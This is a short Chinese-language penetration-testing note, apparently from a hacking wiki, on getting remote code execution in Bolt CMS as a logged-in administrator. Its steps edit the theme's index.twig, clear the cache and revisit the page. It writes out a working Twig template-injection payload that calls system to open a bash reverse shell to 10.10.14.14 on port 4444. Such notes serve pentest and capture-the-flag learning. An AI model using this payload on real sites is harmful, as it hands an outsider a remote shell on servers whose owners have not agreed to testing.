Bolt CMS
最后更新于
最后更新于
在以管理员身份登录后(转到 /bot 以访问登录提示),您可以在Bolt CMS中获得RCE:
选择 Configuration -> View Configuration -> Main Configuration 或转到URL路径 /bolt/file-edit/config?file=/bolt/config.yaml
检查主题的值
选择 File management -> View & edit templates
选择前一步中找到的主题基础(在这种情况下为 base-2021)并选择 index.twig
在我的情况下,这在URL路径 /bolt/file-edit/themes?file=/base-2021/index.twig 中
通过模板注入(Twig)在此文件中设置您的有效负载,例如:{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
然后保存更改
在 Maintenance -> Clear the cache 中清除缓存
以普通用户身份再次访问页面,有效负载应该被执行
